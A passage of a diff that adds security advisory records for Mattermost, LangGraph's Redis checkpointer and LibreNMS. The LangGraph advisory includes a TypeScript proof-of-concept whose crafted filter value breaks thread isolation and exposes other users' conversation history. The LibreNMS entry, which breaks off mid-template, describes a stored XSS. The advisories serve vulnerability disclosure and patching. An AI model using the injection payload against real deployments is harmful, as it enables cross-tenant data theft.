"https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-369" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-24T15:37:53Z", + "nvd_published_at": "2026-02-24T01:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-57cc-2pf4-mhmx/GHSA-57cc-2pf4-mhmx.json b/advisories/github-reviewed/2026/02/GHSA-57cc-2pf4-mhmx/GHSA-57cc-2pf4-mhmx.json new file mode 100644 index 0000000000000..c28727a9374af --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-57cc-2pf4-mhmx/GHSA-57cc-2pf4-mhmx.json @@ -0,0 +1,141 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-57cc-2pf4-mhmx", + "modified": "2026-02-19T19:35:24Z", + "published": "2026-02-16T15:32:47Z", + "aliases": [ + "CVE-2025-14350" + ], + "summary": "Mattermost fails to properly validate team membership when processing channel mentions", + "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 fail to properly validate team membership when processing channel mentions which allows authenticated users to determine the existence of teams and their URL names via posting channel shortlinks and observing the channel_mentions property in the API response. Mattermost Advisory ID: MMSA-2025-00563", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost/server/v8" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "8.0.0-20251209134645-761e56bb11cc" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.1.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 11.1.3" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.11.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 10.11.10" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.2.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 11.2.2" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.3.2-0.20251209134645-761e56bb11cc" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14350" + }, + { + "type": "WEB", + "url": "https://github.com/mattermost/mattermost/commit/761e56bb11ccb751ddbe4bab5898ccc2b384fd82" + }, + { + "type": "PACKAGE", + "url": "https://github.com/mattermost/mattermost" + }, + { + "type": "WEB", + "url": "https://mattermost.com/security-updates" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T19:35:24Z", + "nvd_published_at": "2026-02-16T13:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json b/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json index 40168473dad55..78729e2a9fa3c 100644 --- a/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json +++ b/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json @@ -55,6 +55,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-22", "CWE-23" ], "severity": "HIGH", diff --git a/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json b/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json new file mode 100644 index 0000000000000..fc0753303755a --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5mx2-w598-339m", + "modified": "2026-02-23T22:20:29Z", + "published": "2026-02-18T22:40:09Z", + "aliases": [ + "CVE-2026-27022" + ], + "summary": "RediSearch Query Injection in @langchain/langgraph-checkpoint-redis", + "details": "## Summary\n\nA query injection vulnerability exists in the `@langchain/langgraph-checkpoint-redis` package's filter handling. The `RedisSaver` and `ShallowRedisSaver` classes construct RediSearch queries by directly interpolating user-provided filter keys and values without proper escaping. RediSearch has special syntax characters that can modify query behavior, and when user-controlled data contains these characters, the query logic can be manipulated to bypass intended access controls.\n\n## Attack surface\n\nThe core vulnerability was in the `list()` methods of both `RedisSaver` and `ShallowRedisSaver`: these methods failed to escape RediSearch special characters in filter keys and values when constructing queries. When unescaped data containing RediSearch syntax was used, the injected operators were interpreted by RediSearch rather than treated as literal search values.\n\nThis escaping bug enabled the following attack vector:\n\n- **Thread boundary escape via OR operator**: RediSearch uses `|` as an OR operator with specific precedence rules. A query like `A B | C` is interpreted as `(A AND B) OR C`. By injecting `}) | (@thread_id:{*` into a filter value, an attacker can append an OR clause that matches all threads, effectively bypassing the thread isolation constraint.\n\nThe injected query `(@thread_id:{legitimate-thread}) (@source:{x}) | (@thread_id:{*})` matches:\n\n- Documents with `thread_id:legitimate-thread AND source:x`, OR\n- Documents with ANY `thread_id`\n\nThe second clause matches all threads, bypassing thread isolation entirely.\n\n## Who is affected?\n\nApplications are vulnerable if they:\n\n- **Pass user-controlled input to filter parameters** — When using `getStateHistory()` or `checkpointer.list()` with filter values derived from user input, HTTP parameters, or other untrusted sources.\n- **Use Redis checkpointing in multi-tenant applications** — Applications that rely on thread isolation to separate data between users or tenants are at risk of cross-tenant data access.\n\nThe most common attack vector is through API endpoints that expose filtering capabilities to end users, allowing them to search or filter their conversation history.\n\n## Impact\n\nAttackers who control filter input can bypass thread isolation by injecting RediSearch OR operators to construct queries that match all threads regardless of the intended thread constraint. This enables access to checkpoint data from threads the attacker is not authorized to view.\n\nKey severity factors:\n\n- Enables complete bypass of thread-based access controls\n- Sensitive conversation data from other users may be exposed\n- Affects multi-tenant applications relying on thread isolation for data separation\n- Requires only control over filter input values (common in user-facing APIs)\n\n## Exploit example\n\n```typescript\nimport { RedisSaver } from \"@langchain/langgraph-checkpoint-redis\";\n\nconst saver = new RedisSaver({ /* redis config */ });\n\n// Normal usage - should only see thread \"user-123-thread\"\nconst legitHistory = saver.list({\n configurable: { thread_id: \"user-123-thread\" }\n}, {\n filter: { source: \"loop\" }\n});\n\n// Attacker crafts malicious filter value\nconst attackerFilter = {\n source: \"x}) | (@thread_id:{*\" // Injects OR clause matching ALL threads\n};\n\n// This produces a query like:\n// (@thread_id:{user-123-thread}) (@source:{x}) | (@thread_id:{*})\n// Due to precedence, this matches ALL threads!\n\nconst stolenHistory = saver.list({\n configurable: { thread_id: \"user-123-thread\" }\n}, {\n filter: attackerFilter\n});\n\n// stolenHistory now contains checkpoints from ALL threads - DATA LEAKED!\n```\n\n## Security hardening changes\n\nThe 1.0.2 patch introduces the following changes:\n\n- **Escape utility function**: A new `escapeRediSearchTagValue()` function properly escapes all RediSearch special characters (`- . < > { } [ ] \" ' : ; ! @ # $ % ^ & * ( ) + = ~ | \\ ? /`) by prefixing them with backslashes.\n- **Filter key escaping**: All filter keys are escaped before being used in query construction.\n- **Filter value escaping**: All filter values are escaped before being interpolated into RediSearch tag queries.\n\n## Migration guide\n\n### No changes needed for most users\n\nThe fix is backward compatible. Existing code will work without modifications—filter values that previously worked will continue to work, with the added protection against injection:\n\n```typescript\nimport { RedisSaver } from \"@langchain/langgraph-checkpoint-redis\";\n\n// Works exactly as before, now with injection protection\nconst history = saver.list(config, {\n filter: { source: \"loop\" }\n});\n```\n\n### If you were relying on special characters\n\nIf your application intentionally used RediSearch syntax in filter values (unlikely but possible), be aware that these characters will now be escaped and treated as literals.\n\n### For applications with user-facing filters\n\nNo code changes required, but this is a good time to review your API design:\n\n```typescript\n// Before: Vulnerable to injection\napp.get(\"/history\", async (req, res) => {\n const history = await saver.list(config, {\n filter: req.query.filter // User-controlled - was vulnerable\n });\n});\n\n// After: Now safe, but consider validating allowed filter keys\napp.get(\"/history\", async (req, res) => {\n const allowedKeys = [\"source\", \"step\"];\n const sanitizedFilter = Object.fromEntries(\n Object.entries(req.query.filter || {})\n .filter(([key]) => allowedKeys.includes(key))\n );\n const history = await saver.list(config, {\n filter: sanitizedFilter\n });\n});\n```\n\n> **Recommendation**: Even with the fix in place, consider validating that filter keys are from an allowed list as a defense-in-depth measure.\n\n## References\n\n- [RediSearch Query Syntax](https://redis.io/docs/interact/search-and-query/query/)\n- [LangGraph Checkpoint Documentation](https://langchain-ai.github.io/langgraphjs/)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@langchain/langgraph-checkpoint-redis" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langgraphjs/security/advisories/GHSA-5mx2-w598-339m" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27022" + }, + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langgraphjs/pull/1943" + }, + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langgraphjs/commit/814c76dc3938d0f6f7e17ca3bc11d6a12270b2a1" + }, + { + "type": "PACKAGE", + "url": "https://github.com/langchain-ai/langgraphjs" + }, + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langgraphjs/releases/tag/@langchain/langgraph-checkpoint-redis@1.0.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:40:09Z", + "nvd_published_at": "2026-02-20T22:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json new file mode 100644 index 0000000000000..73c3c3c48bb22 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pqf-54qp-32wx", + "modified": "2026-02-20T16:51:51Z", + "published": "2026-02-18T22:07:19Z", + "aliases": [ + "CVE-2026-26991" + ], + "summary": "LibreNMS /device-groups name Stored Cross-Site Scripting", + "details": "### Summary\n**/device-groups name Stored Cross-Site Scripting**\n- HTTP POST\n- Request-URI(s): \"/device-groups\"\n- Vulnerable parameter(s): \"name\"\n- Attacker must be authenticated with \"admin\" privileges.\n- When a user adds a device group, an HTTP POST request is sent to the Request-URI \"/device-groups\". The name of the newly created device group is stored in the value of the name parameter.\n- After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.\n\n### Details\nThe vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters\nor strings. When the delete button is rendered, the following template is used to render the page:\n\n_resources/views/device-group/index.blade.php:_\n```\n@section('title', __('Device Groups'))\n@section('content')\n
\n\n// [...Truncated...]\n@foreach($device_groups as $device_group)\n// [...Truncated...]\n\n